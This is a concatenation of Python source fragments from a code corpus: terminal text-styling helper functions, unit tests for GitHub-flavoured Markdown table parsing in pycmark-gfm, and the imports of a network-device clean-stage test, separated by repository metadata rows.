return foreground(NamedColor.BRIGHT_RED, *parts)
def bright_red_background(*parts: SequencePart) -> SequenceType:
return background(NamedColor.BRIGHT_RED, *parts)
def bright_white(*parts: SequencePart) -> SequenceType:
return foreground(NamedColor.BRIGHT_WHITE, *parts)
def bright_white_background(*parts: SequencePart) -> SequenceType:
return background(NamedColor.BRIGHT_WHITE, *parts)
def bright_yellow(*parts: SequencePart) -> SequenceType:
return foreground(NamedColor.BRIGHT_YELLOW, *parts)
def bright_yellow_background(*parts: SequencePart) -> SequenceType:
return background(NamedColor.BRIGHT_YELLOW, *parts)
def circle(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FRAME_CIRCLE, *parts)
def conceal(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.CONCEAL_ON, *parts)
def cyan(*parts: SequencePart) -> SequenceType:
return foreground(NamedColor.CYAN, *parts)
def cyan_background(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BACKGROUND_CYAN, *parts)
def double_line_under_or_right(*parts: SequencePart) -> SequenceType:
return make_sequence(
SelectGraphicRendition.IDEOGRAM_DOUBLE_LINE_UNDER_OR_RIGHT,
*parts,
)
def double_line_over_or_left(*parts: SequencePart) -> SequenceType:
return make_sequence(
SelectGraphicRendition.IDEOGRAM_DOUBLE_LINE_OVER_OR_LEFT,
*parts,
)
def double_underline(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.UNDERLINE_DOUBLE, *parts)
def fast_blink(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BLINK_FAST, *parts)
def foreground(color: Color, *parts: SequencePart) -> SequenceType:
i = get_color_interpreter(InterpretationKey.FOREGROUND)
return i.make_sequence(color, *parts)
def frame(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FRAME_BOX, *parts)
def green(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FOREGROUND_GREEN, *parts)
def green_background(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BACKGROUND_GREEN, *parts)
def heavy(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.WEIGHT_HEAVY, *parts)
def invert(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.INVERT_ON, *parts)
def italic(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.CALLIGRAPHY_ITALIC, *parts)
def light(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.WEIGHT_LIGHT, *parts)
def magenta(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FOREGROUND_MAGENTA, *parts)
def magenta_background(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BACKGROUND_MAGENTA, *parts)
def make_sequence(sgr: SelectGraphicRendition, *parts: SequencePart) -> SequenceType:
i = get_interpreter_for_sgr(sgr)
return i.make_sequence(sgr, *parts)
def overline(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.OVERLINE_ON, *parts)
def proportional_spacing(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.PROPORTIONAL_SPACING_ON, *parts)
def red(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FOREGROUND_RED, *parts)
def red_background(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BACKGROUND_RED, *parts)
def sequence(*parts: SequencePart) -> SequenceType:
return Sequence(*parts)
def single_line_under_or_right(*parts: SequencePart) -> SequenceType:
return make_sequence(
SelectGraphicRendition.IDEOGRAM_SINGLE_LINE_UNDER_OR_RIGHT,
*parts,
)
def single_line_over_or_left(*parts: SequencePart) -> SequenceType:
return make_sequence(
SelectGraphicRendition.IDEOGRAM_SINGLE_LINE_OVER_OR_LEFT,
*parts,
)
def single_underline(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.UNDERLINE_SINGLE, *parts)
def slow_blink(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BLINK_SLOW, *parts)
def strike(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.STRIKE_ON, *parts)
def stress(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.IDEOGRAM_STRESS, *parts)
def white(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FOREGROUND_WHITE, *parts)
def white_background(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BACKGROUND_WHITE, *parts)
def yellow(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FOREGROUND_YELLOW, *parts)
def yellow_background(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BACKGROUND_YELLOW, *parts)
__all__ = [
"get_version",
"Interpretation",
"Sequence",
]
| 30.824742
| 85
| 0.78796
| 927
| 8,970
| 7.381877
| 0.0863
| 0.231477
| 0.275464
| 0.317112
| 0.800088
| 0.780944
| 0.716645
| 0.576355
| 0.334356
| 0.081835
| 0
| 0.002281
| 0.120067
| 8,970
| 290
| 86
| 30.931034
| 0.86469
| 0
| 0
| 0.063694
| 0
| 0
| 0.003679
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.414013
| false
| 0
| 0.038217
| 0.394904
| 0.866242
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
00f46f858f83b7ae790eff1489124903e170aabb
| 7,391
|
py
|
Python
|
tests/test_blockparser_table.py
|
tk0miya/pycmark-gfm
|
db31d034c592fa3139a7bc672b0eae7a6fefa7d9
|
[
"Apache-2.0"
] | 1
|
2019-05-12T07:21:02.000Z
|
2019-05-12T07:21:02.000Z
|
tests/test_blockparser_table.py
|
tk0miya/pycmark-gfm
|
db31d034c592fa3139a7bc672b0eae7a6fefa7d9
|
[
"Apache-2.0"
] | null | null | null |
tests/test_blockparser_table.py
|
tk0miya/pycmark-gfm
|
db31d034c592fa3139a7bc672b0eae7a6fefa7d9
|
[
"Apache-2.0"
] | null | null | null |
"""
test_blockparser_table
~~~~~~~~~~~~~~~~~~~~~~
:copyright: Copyright 2019 by Takeshi KOMIYA
:license: Apache License 2.0, see LICENSE for details.
"""
from docutils import nodes
from utils import publish, assert_node
def test_example_191():
text = ("| foo | bar |\n"
"| --- | --- |\n"
"| baz | bim |\n")
result = publish(text)
assert_node(result, [nodes.document, nodes.table, nodes.tgroup, (nodes.colspec,
nodes.colspec,
nodes.thead,
nodes.tbody)])
assert_node(result[0][0][2], [nodes.thead, nodes.row, ([nodes.entry, nodes.paragraph, "foo"],
[nodes.entry, nodes.paragraph, "bar"])])
assert_node(result[0][0][3], [nodes.tbody, nodes.row, ([nodes.entry, nodes.paragraph, "baz"],
[nodes.entry, nodes.paragraph, "bim"])])
def test_example_192():
text = ("| abc | defghi |\n"
":-: | -----------:\n"
"bar | baz\n")
result = publish(text)
assert_node(result, [nodes.document, nodes.table, nodes.tgroup, (nodes.colspec,
nodes.colspec,
nodes.thead,
nodes.tbody)])
assert_node(result[0][0][2], [nodes.thead, nodes.row, ([nodes.entry, nodes.paragraph, "abc"],
[nodes.entry, nodes.paragraph, "defghi"])])
assert_node(result[0][0][3], [nodes.tbody, nodes.row, ([nodes.entry, nodes.paragraph, "bar"],
[nodes.entry, nodes.paragraph, "baz"])])
assert_node(result[0][0][2][0][0], align="center")
assert_node(result[0][0][2][0][1], align="right")
assert_node(result[0][0][3][0][0], align="center")
assert_node(result[0][0][3][0][1], align="right")
def test_example_193():
text = ("| f\\|oo |\n"
"| ------ |\n"
"| b `\\|` az |\n"
"| b **\\|** im |\n")
result = publish(text)
assert_node(result, [nodes.document, nodes.table, nodes.tgroup, (nodes.colspec,
nodes.thead,
nodes.tbody)])
assert_node(result[0][0][1], [nodes.thead, nodes.row, nodes.entry, nodes.paragraph, "f|oo"])
assert_node(result[0][0][2], [nodes.tbody, ([nodes.row, nodes.entry, nodes.paragraph, ("b ",
[nodes.literal, "|"],
" az")],
[nodes.row, nodes.entry, nodes.paragraph, ("b ",
[nodes.strong, "|"],
" im")])])
def test_example_194():
text = ("| abc | def |\n"
"| --- | --- |\n"
"| bar | baz |\n"
"> bar\n")
result = publish(text)
assert_node(result, [nodes.document, ([nodes.table, nodes.tgroup, (nodes.colspec,
nodes.colspec,
nodes.thead,
nodes.tbody)],
[nodes.block_quote, nodes.paragraph, "bar"])])
assert_node(result[0][0][2], [nodes.thead, nodes.row, ([nodes.entry, nodes.paragraph, "abc"],
[nodes.entry, nodes.paragraph, "def"])])
assert_node(result[0][0][3], [nodes.tbody, nodes.row, ([nodes.entry, nodes.paragraph, "bar"],
[nodes.entry, nodes.paragraph, "baz"])])
def test_example_195():
text = ("| abc | def |\n"
"| --- | --- |\n"
"| bar | baz |\n"
"bar\n"
"\n"
"bar\n")
result = publish(text)
assert_node(result, [nodes.document, ([nodes.table, nodes.tgroup, (nodes.colspec,
nodes.colspec,
nodes.thead,
nodes.tbody)],
[nodes.paragraph, "bar"])])
assert_node(result[0][0][2], [nodes.thead, nodes.row, ([nodes.entry, nodes.paragraph, "abc"],
[nodes.entry, nodes.paragraph, "def"])])
assert_node(result[0][0][3], [nodes.tbody, ([nodes.row, ([nodes.entry, nodes.paragraph, "bar"],
[nodes.entry, nodes.paragraph, "baz"])],
[nodes.row, ([nodes.entry, nodes.paragraph, "bar"],
nodes.entry)])])
def test_example_196():
text = ("| abc | def |\n"
"| --- |\n"
"| bar |\n")
result = publish(text)
assert_node(result, [nodes.document, nodes.paragraph, text.strip()])
def test_example_197():
text = ("| abc | def |\n"
"| --- | --- |\n"
"| bar |\n"
"| bar | baz | boo |\n")
result = publish(text)
assert_node(result, [nodes.document, nodes.table, nodes.tgroup, (nodes.colspec,
nodes.colspec,
nodes.thead,
nodes.tbody)])
assert_node(result[0][0][2], [nodes.thead, nodes.row, ([nodes.entry, nodes.paragraph, "abc"],
[nodes.entry, nodes.paragraph, "def"])])
assert_node(result[0][0][3], [nodes.tbody, ([nodes.row, ([nodes.entry, nodes.paragraph, "bar"],
nodes.entry)],
[nodes.row, ([nodes.entry, nodes.paragraph, "bar"],
[nodes.entry, nodes.paragraph, "baz"])])])
def test_example_198():
text = ("| abc | def |\n"
"| --- | --- |\n")
result = publish(text)
assert_node(result, [nodes.document, nodes.table, nodes.tgroup, (nodes.colspec,
nodes.colspec,
nodes.thead)])
assert_node(result[0][0][2], [nodes.thead, nodes.row, ([nodes.entry, nodes.paragraph, "abc"],
[nodes.entry, nodes.paragraph, "def"])])
| 53.557971
| 112
| 0.375727
| 612
| 7,391
| 4.464052
| 0.107843
| 0.153734
| 0.153734
| 0.237189
| 0.846266
| 0.835652
| 0.832723
| 0.800878
| 0.747804
| 0.708638
| 0
| 0.023159
| 0.480043
| 7,391
| 137
| 113
| 53.948905
| 0.687744
| 0.019754
| 0
| 0.539823
| 0
| 0
| 0.069796
| 0
| 0
| 0
| 0
| 0
| 0.230089
| 1
| 0.070796
| false
| 0
| 0.017699
| 0
| 0.088496
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dab1327bc821333d4464e6555e5e28efc3f517b0
| 973
|
py
|
Python
|
articlenizer/tokenize.py
|
BeTKH/articlenizer
|
7f18a630c71fcb7c80c710b9ef3870e460f49cac
|
[
"MIT"
] | 1
|
2022-01-04T11:58:36.000Z
|
2022-01-04T11:58:36.000Z
|
articlenizer/tokenize.py
|
BeTKH/articlenizer
|
7f18a630c71fcb7c80c710b9ef3870e460f49cac
|
[
"MIT"
] | null | null | null |
articlenizer/tokenize.py
|
BeTKH/articlenizer
|
7f18a630c71fcb7c80c710b9ef3870e460f49cac
|
[
"MIT"
] | 1
|
2022-02-15T17:09:37.000Z
|
2022-02-15T17:09:37.000Z
|
import re
# TODO numbers such as 10,000 and stuff such as R&D
TOKENIZATION_REGEX = re.compile(r'((?:10.1371.journal.[a-z]+.[a-z0-9\.]+)|https?\:\/\/[a-zA-Z0-9\-\.]+[\w\/\._\-\:~\?=#%]*[\w\/_\-\:~\?=#%]|ftp\:\/\/[a-zA-Z0-9\-\.]+[\w\/\._\-\:~\?=#%]*[\w\/_\-\:~\?=#%]|www\.[a-zA-Z0-9\-\.]+[\w\/\._\-\:~\?=#%]*|[a-zA-Z0-9\-\.]+\.org\/[\w\/_\-\:~\?=#%]*|[a-zA-Z0-9\-\.]+\.edu\/[\w\/_\-\:~\?=#%]*|[\.0-9]+[0-9][a-zA-Z]+|v\.|ver\.|V\.|Ver\.|e\.g\.|i\.e\.|i\.v\.|[0-9]{1,3},[0-9]{3},[0-9]{3}|[0-9]{1,3},[0-9]{3}|\[[0-9\-,\?]+\]|[0-9\.]*\.[0-9]+[a-zA-Z]*|[\.0-9]+[a-zA-Z]+|[a-qs-uw-zA-QS-UW-Z]+[0-9][a-zA-Z]+|[a-qs-uw-zA-QS-UW-Z][0-9]+[a-zA-Z]?|[a-zA-Z]+&[a-zA-Z]+|[a-zA-Z]+\.[a-zA-Z]+|[a-zA-Z]+|[0-9]+|[^0-9a-zA-Z\s])')
def tokenize(line):
"""Tokenize a string based on a regular expression
Args:
line (string): string to tokenize
Returns:
list of string: list of individual tokens
"""
return [t for t in TOKENIZATION_REGEX.split(line) if t]
| 64.866667
| 649
| 0.455293
| 189
| 973
| 2.296296
| 0.322751
| 0.103687
| 0.092166
| 0.080645
| 0.31106
| 0.260369
| 0.221198
| 0.186636
| 0.186636
| 0.145161
| 0
| 0.067797
| 0.090442
| 973
| 15
| 650
| 64.866667
| 0.422599
| 0.204522
| 0
| 0
| 0
| 0.25
| 0.819519
| 0.819519
| 0
| 0
| 0
| 0.066667
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
dab420a0daff73401e49faeedb0fffeb0bd69f00
| 5,490
|
py
|
Python
|
remc/antlr_output/languageListener.py
|
horus-4ever/python-remc
|
1dac312634c9c8f4f60f4f01bdddfac45b34063e
|
[
"MIT"
] | null | null | null |
remc/antlr_output/languageListener.py
|
horus-4ever/python-remc
|
1dac312634c9c8f4f60f4f01bdddfac45b34063e
|
[
"MIT"
] | null | null | null |
remc/antlr_output/languageListener.py
|
horus-4ever/python-remc
|
1dac312634c9c8f4f60f4f01bdddfac45b34063e
|
[
"MIT"
] | null | null | null |
# Generated from language.g4 by ANTLR 4.9.2
from antlr4 import *
if __name__ is not None and "." in __name__:
from .languageParser import languageParser
else:
from languageParser import languageParser
# This class defines a complete listener for a parse tree produced by languageParser.
class languageListener(ParseTreeListener):
# Enter a parse tree produced by languageParser#entry_point.
def enterEntry_point(self, ctx:languageParser.Entry_pointContext):
pass
# Exit a parse tree produced by languageParser#entry_point.
def exitEntry_point(self, ctx:languageParser.Entry_pointContext):
pass
# Enter a parse tree produced by languageParser#extern_declaration.
def enterExtern_declaration(self, ctx:languageParser.Extern_declarationContext):
pass
# Exit a parse tree produced by languageParser#extern_declaration.
def exitExtern_declaration(self, ctx:languageParser.Extern_declarationContext):
pass
# Enter a parse tree produced by languageParser#function_prototype.
def enterFunction_prototype(self, ctx:languageParser.Function_prototypeContext):
pass
# Exit a parse tree produced by languageParser#function_prototype.
def exitFunction_prototype(self, ctx:languageParser.Function_prototypeContext):
pass
# Enter a parse tree produced by languageParser#function_declaration.
def enterFunction_declaration(self, ctx:languageParser.Function_declarationContext):
pass
# Exit a parse tree produced by languageParser#function_declaration.
def exitFunction_declaration(self, ctx:languageParser.Function_declarationContext):
pass
# Enter a parse tree produced by languageParser#kind.
def enterKind(self, ctx:languageParser.KindContext):
pass
# Exit a parse tree produced by languageParser#kind.
def exitKind(self, ctx:languageParser.KindContext):
pass
# Enter a parse tree produced by languageParser#normal_type.
def enterNormal_type(self, ctx:languageParser.Normal_typeContext):
pass
# Exit a parse tree produced by languageParser#normal_type.
def exitNormal_type(self, ctx:languageParser.Normal_typeContext):
pass
# Enter a parse tree produced by languageParser#pointer_type.
def enterPointer_type(self, ctx:languageParser.Pointer_typeContext):
pass
# Exit a parse tree produced by languageParser#pointer_type.
def exitPointer_type(self, ctx:languageParser.Pointer_typeContext):
pass
# Enter a parse tree produced by languageParser#block.
def enterBlock(self, ctx:languageParser.BlockContext):
pass
# Exit a parse tree produced by languageParser#block.
def exitBlock(self, ctx:languageParser.BlockContext):
pass
# Enter a parse tree produced by languageParser#statement.
def enterStatement(self, ctx:languageParser.StatementContext):
pass
# Exit a parse tree produced by languageParser#statement.
def exitStatement(self, ctx:languageParser.StatementContext):
pass
# Enter a parse tree produced by languageParser#expression.
def enterExpression(self, ctx:languageParser.ExpressionContext):
pass
# Exit a parse tree produced by languageParser#expression.
def exitExpression(self, ctx:languageParser.ExpressionContext):
pass
# Enter a parse tree produced by languageParser#function_call.
def enterFunction_call(self, ctx:languageParser.Function_callContext):
pass
# Exit a parse tree produced by languageParser#function_call.
def exitFunction_call(self, ctx:languageParser.Function_callContext):
pass
# Enter a parse tree produced by languageParser#factor.
def enterFactor(self, ctx:languageParser.FactorContext):
pass
# Exit a parse tree produced by languageParser#factor.
def exitFactor(self, ctx:languageParser.FactorContext):
pass
# Enter a parse tree produced by languageParser#non_expression.
def enterNon_expression(self, ctx:languageParser.Non_expressionContext):
pass
# Exit a parse tree produced by languageParser#non_expression.
def exitNon_expression(self, ctx:languageParser.Non_expressionContext):
pass
# Enter a parse tree produced by languageParser#return_statement.
def enterReturn_statement(self, ctx:languageParser.Return_statementContext):
pass
# Exit a parse tree produced by languageParser#return_statement.
def exitReturn_statement(self, ctx:languageParser.Return_statementContext):
pass
# Enter a parse tree produced by languageParser#parameters.
def enterParameters(self, ctx:languageParser.ParametersContext):
pass
# Exit a parse tree produced by languageParser#parameters.
def exitParameters(self, ctx:languageParser.ParametersContext):
pass
# Enter a parse tree produced by languageParser#parameter.
def enterParameter(self, ctx:languageParser.ParameterContext):
pass
# Exit a parse tree produced by languageParser#parameter.
def exitParameter(self, ctx:languageParser.ParameterContext):
pass
# Enter a parse tree produced by languageParser#arguments.
def enterArguments(self, ctx:languageParser.ArgumentsContext):
pass
# Exit a parse tree produced by languageParser#arguments.
def exitArguments(self, ctx:languageParser.ArgumentsContext):
pass
del languageParser
| 33.272727
| 88
| 0.74827
| 611
| 5,490
| 6.621931
| 0.166939
| 0.051903
| 0.086505
| 0.155709
| 0.843055
| 0.717004
| 0.708601
| 0.533366
| 0.37741
| 0
| 0
| 0.001129
| 0.193078
| 5,490
| 165
| 89
| 33.272727
| 0.91219
| 0.381785
| 0
| 0.453333
| 1
| 0
| 0.000301
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.453333
| false
| 0.453333
| 0.04
| 0
| 0.506667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
dad16fe3d479d836846f8a722b5df105ba4cdac5
| 5,839
|
py
|
Python
|
test/drafting.py
|
Larook/DRL_LUDO
|
93e81b45d69de369efd199095bb891aef2c390e7
|
[
"MIT"
] | null | null | null |
test/drafting.py
|
Larook/DRL_LUDO
|
93e81b45d69de369efd199095bb891aef2c390e7
|
[
"MIT"
] | null | null | null |
test/drafting.py
|
Larook/DRL_LUDO
|
93e81b45d69de369efd199095bb891aef2c390e7
|
[
"MIT"
] | null | null | null |
import numpy as np
def get_state_after_action(pieces_player_begin, state_begin, dice, action):
"""
knowing where are current player's pieces and whats the dice and action to take
:return: state of the player after making the move
"""
import config
tile_move_from = pieces_player_begin[action]
state_new = state_begin.copy()
for tile_id, value in enumerate(state_begin):
if tile_id == tile_move_from:
# remove piece from this tile
state_new[tile_id] -= 0.25
# put the piece on the wanted tile
if tile_move_from+dice < config.finished_tile:
state_new[tile_move_from+dice] += 0.25
else:
# if in the safe zone and dice overshoot, take steps back
tile_difference = config.finished_tile - (tile_move_from + dice)
state_new[config.finished_tile - tile_difference] += 0.25
return state_new
# if __name__ == "__main__":
# dice = 6
# begin_state = [1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.25, 0.25, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
# action = 0
# new_state = [0.75, 0.25, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,0.0, 0.0, 0.0, 0.0, 0.0,0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.25, 0.25, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,0.0, 0.0, 0.0, 0.0, 0.0]
# pieces_player_begin = [0,0,0,0]
# state_new_check = get_state_after_action(pieces_player_begin, begin_state, dice, action)
def get_enemy_mapped_state(i_enemy, state):
""" need to get values between 0 and 59 - mapped from enemy's state """
mapped_state = []
state = np.array(state) + i_enemy*14
print("state", state)
return mapped_state
def map_enemy_tile_id_to_player_0(i_enemy, tile_id):
""" knowing enemy id and the tile that he sees
check what is the tile in the coordinates of ai player """
tile_ai = i_enemy*13 + tile_id
if tile_ai >= 53:
tile_ai -= 53
tile_ai += 1
if tile_id >= 54:
tile_ai = 0
return tile_ai
def map_tile_id_p0_to_enemy(i_enemy, tile_id_p0_check):
""" p0-1 -> e1-40, e2-27, e3-14
p0-2 -> e2-41, e2-28, e3-15
"""
if tile_id_p0_check == 0:
return 0
tile_enemy = i_enemy*(-13) + tile_id_p0_check
if tile_enemy >= 53:
tile_enemy -= 53
# tile_enemy += 1
if tile_enemy >= 54:
tile_enemy = 0
if tile_enemy < 1:
tile_enemy += 53
tile_enemy -= 1
return tile_enemy
if __name__ == "__main__":
enemy_state = [0.75, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.25, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,0.0, 0.0, 0.0,0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,0.0, 0.0, 0.0,0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,0.0, 0.0, 0.0,0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
# print(len(enemy_state))
# mapped_state = get_enemy_mapped_state(1, enemy_state)
tile_seen_from_enemy = 14
print("tile_seen_from_enemy", tile_seen_from_enemy)
# tile_seen_from_enemy = 54
tile_ai = map_enemy_tile_id_to_player_0(1, tile_seen_from_enemy)
print("tile_ai", tile_ai)
tile_ai = 51
tile_enemy = map_tile_id_p0_to_enemy(i_enemy=1, tile_id_p0_check=tile_ai)
print("tile_enemy", tile_enemy)
| 54.064815
| 1,219
| 0.484843
| 1,499
| 5,839
| 1.784523
| 0.063376
| 0.785794
| 1.164112
| 1.53271
| 0.524112
| 0.501308
| 0.485607
| 0.441495
| 0.404486
| 0.404486
| 0
| 0.281633
| 0.286693
| 5,839
| 107
| 1,220
| 54.570093
| 0.360624
| 0.618942
| 0
| 0
| 0
| 0
| 0.023343
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.041667
| 0
| 0.229167
| 0.083333
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
97417176b64fa71141b1dbb19bea04548182f417
| 15,517
|
py
|
Python
|
pkgs/clean-pkg/src/genie/libs/clean/stages/nxos/tests/test_change_boot_variable.py
|
patrickboertje/genielibs
|
61c37aacf3dd0f499944555e4ff940f92f53dacb
|
[
"Apache-2.0"
] | 1
|
2022-01-16T10:00:24.000Z
|
2022-01-16T10:00:24.000Z
|
pkgs/clean-pkg/src/genie/libs/clean/stages/nxos/tests/test_change_boot_variable.py
|
patrickboertje/genielibs
|
61c37aacf3dd0f499944555e4ff940f92f53dacb
|
[
"Apache-2.0"
] | null | null | null |
pkgs/clean-pkg/src/genie/libs/clean/stages/nxos/tests/test_change_boot_variable.py
|
patrickboertje/genielibs
|
61c37aacf3dd0f499944555e4ff940f92f53dacb
|
[
"Apache-2.0"
] | null | null | null |
import logging
import unittest
from unittest.mock import Mock
from genie.libs.clean.stages.nxos.stages import ChangeBootVariable
